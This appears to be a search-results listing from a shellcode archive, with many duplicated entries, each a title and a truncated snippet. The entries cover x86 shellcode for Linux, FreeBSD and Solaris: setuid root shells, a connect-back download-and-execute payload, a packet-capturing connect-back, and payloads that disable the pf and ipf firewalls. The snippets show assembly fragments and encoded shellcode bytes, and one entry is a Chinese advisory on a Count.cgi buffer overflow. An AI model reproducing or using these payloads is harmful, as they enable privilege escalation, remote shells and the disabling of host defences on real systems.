1131 matches found
solaris/x86 setuid0, execve//bin/sh; exit0 NULL Free 39 bytes
solaris/x86 setuid0, execve//bin/sh; exit0 NULL Free 39 bytes. Shellcode exploit for solarisx86 platform / ; sm4x 2008 ; setuid0, execve'/bin/sh', '/bin/sh', 0, ; 39 bytes NizzULL free you know... ; SunOS sol01 5.11 snv86 i86pc i386 i86pc Solaris ; quick port to drop root sh - ; - SunOS is pwnij...
linux/x86 - connect-back port UDP/54321 live packet capture 151 bytes
linux/x86 connect-back port UDP/54321 live packet capture 151 bytes. Shellcode exploit for linx86 platform / linux/x86 connect-back port UDP/54321 & dup2 & fork & execve /usr/bin/tcpdump -iany -w- "port ! 54321" 151 bytes by XenoMuta | |/ / / |/ / / / | / / / / /|/ / / / / / / / / / / / / // / /...
linux/x86 setuid(0) & execve(/bin/sh,0,0) shellcode 27 bytes
No description provided by source. ----------- C Source Code ----------- / Smallest GNU/Linux x86 setuid0 && execve"/bin/sh",0,0 Shellcode without NULLs Coded by Chema Garcia aka sch3m4 + [email protected] + http://opensec.es Shellcode Size: 27 bytes Date: 13/11/2008 / include stdio.h const char...
linux/x86 setuid(0) & execve(/bin/sh 0 0) shellcode 28 bytes
No description provided by source. -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve"/bin/sh",0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f lea eax,ecx+0Bh mov ebx,esp int 80h...
linux/x86 setuid(0) & execve(/bin/sh,0,0) shellcode 28 bytes
Exploit for linux/x86 platform in category shellcode ============================================================ linux/x86 setuid0 & execve/bin/sh,0,0 shellcode 28 bytes ============================================================ -------------------ASM---------------------- global start section...
linux/x86 setuid0 & execve/bin/sh,0,0 shellcode 28 bytes
linux/x86 setuid0 & execve/bin/sh,0,0 shellcode 28 bytes. Shellcode exploit for linx86 platform -------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve"/bin/sh",0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f...
Count.cgi(wwwcount)远程缓冲区溢出漏洞
BugCVE: CVE-1999-0021 BUGTRAQ: 128 Count.cgi wwwcount是一个非常流行的Web站点跟踪统计CGI程序。一般它作为Web页面点击数统计。1997年10月,这个程序被发现了两个远程漏洞。第一个漏洞比较轻微,它能允许远程用户浏览到受限制的.GIF文件,可能泄漏.GIF文件里潜在的敏感数据。 第二个漏洞比较严重,count.cgi程序在处理QUERYSTRING环境变量的时候存在缓冲区溢出漏洞。远程攻击者可以发送一个超长的请求给程序就能进行溢出攻击,以Web用户的权限在系统执行任意命令。 2.3 Muhammad A. Muquit...
freebsd/x86 setreuid, execve(pfctl -d) 56 bytes
No description provided by source. CoDed bY suN8Hclf DaRk-CodeRs Group production, kid FreeBSD x86 setreuid0, 0 + execvepfctl -d 56 bytes The simples way to disable the FreeBSD's packet filter. We do not flush all rules pfctl -F all but only turn the firewall off. Assembly code:...
freebsd/x86 setreuid, execve(pfctl -d) 56 bytes
Exploit for freebsd/x86 platform in category shellcode =============================================== freebsd/x86 setreuid, execvepfctl -d 56 bytes =============================================== CoDed bY suN8Hclf DaRk-CodeRs Group production, kid FreeBSD x86 setreuid0, 0 + execvepfctl -d 56 byt...
freebsd/x86 - setreuid, execvepfctl -d 56 bytes
freebsd/x86 setreuid, execvepfctl -d 56 bytes. Shellcode exploit for freebsdx86 platform CoDed bY suN8Hclf DaRk-CodeRs Group production, kid FreeBSD x86 setreuid0, 0 + execvepfctl -d 56 bytes The simples way to disable the FreeBSD's packet filter. We do not flush all rules pfctl -F all but only...
freebsd/x86 setreuid execve(pfctl -d) 56 bytes
No description provided by source. CoDed bY suN8Hclf DaRk-CodeRs Group production, kid FreeBSD x86 setreuid0, 0 + execvepfctl -d 56 bytes The simples way to disable the FreeBSD's packet filter. We do not flush all rules pfctl -F all but only turn the firewall off. Assembly code:...
linux/x86 connect back, download a file and execute 149 bytes
No description provided by source. / ;file download shellcode 149 bytes ; ;connect back, download a file and execute. ;modify the name of the file and the ip address first. ; ;militan ;Advanced Defense LabADL ; global start start: xor ecx,ecx mul ecx xor ebx,ebx cdq ;socket push eax push byte 0x1...
freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 56 bytes
No description provided by source. ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0, 0; ; 56 bytes ; FreeBSD 7.0-RELEASE global start start: main: ; --------------------- setuid 0 xor eax, eax xor ecx, ecx push eax ;0 mov al, 0x17 int 0x80 ; --------------------- -Faa xor eax,...
freebsd/x86 setuid(0); execve(ipf -Fa); shellcode 57 bytes
Exploit for freebsd/x86 platform in category shellcode ========================================================== freebsd/x86 setuid0; execveipf -Fa; shellcode 57 bytes ========================================================== ; sm4x - 2008 ; setuid0; execve"//sbin/ipf", "//sbin/ipf", "-Faa", 0,...
linux/86 setreuid(geteuid, geteuid) + execve(/bin/sh) shellcode
No description provided by source. / setreuidgeteuid, geteuid + execve/bin/sh shellcode - useful for wargames and the like. global start section .text start: ; geteuid push byte 49 pop eax int 0x80 ; setreuid mov ebx, eax mov ecx, eax push byte 70 pop eax int 0x80 ; execve xor eax,eax push eax pu...
freebsd/x86 - encrypted shellcode /bin/sh 48 bytes
freebsd/x86 encrypted shellcode /bin/sh 48 bytes. Shellcode exploit for freebsdx86 platform / Encoded SUB shellcode execve /bin/sh of 48 bytes by [email protected] Hack 'n Roll / char shellcode = "\x31\xd2" "\xeb\x0e" "\x31\xdb" "\x5b" "\xb1\x19" "\x83\x2c\x1a\x01" "\x42" "\xe2\xf9"...
linux/86 setreuid(geteuid geteuid) + execve(/bin/sh) shellcode
No description provided by source. / setreuidgeteuid, geteuid + execve/bin/sh shellcode - useful for wargames and the like. global start section .text start: ; geteuid push byte 49 pop eax int 0x80 ; setreuid mov ebx, eax mov ecx, eax push byte 70 pop eax int 0x80 ; execve xor eax,eax push eax pu...
linux/86 setreuidgeteuid, geteuid + execve/bin/sh shellcode
linux/86 setreuidgeteuid, geteuid + execve/bin/sh shellcode. Shellcode exploit for linx86 platform / setreuidgeteuid, geteuid + execve/bin/sh shellcode - useful for wargames and the like. global start section .text start: ; geteuid push byte 49 pop eax int 0x80 ; setreuid mov ebx, eax mov ecx, ea...
linux/x86 setreuid(geteuid, geteuid) + execve(/bin/sh) shellcode
Exploit for linux/x86 platform in category shellcode =============================================================== linux/x86 setreuidgeteuid, geteuid + execve/bin/sh shellcode =============================================================== / setreuidgeteuid, geteuid + execve/bin/sh shellcode -...
freebsd/x86 encrypted shellcode /bin/sh 48 bytes
Exploit for freebsd/x86 platform in category shellcode ================================================ freebsd/x86 encrypted shellcode /bin/sh 48 bytes ================================================ / Encoded SUB shellcode execve /bin/sh of 48 bytes by email protected Hack 'n Roll / char...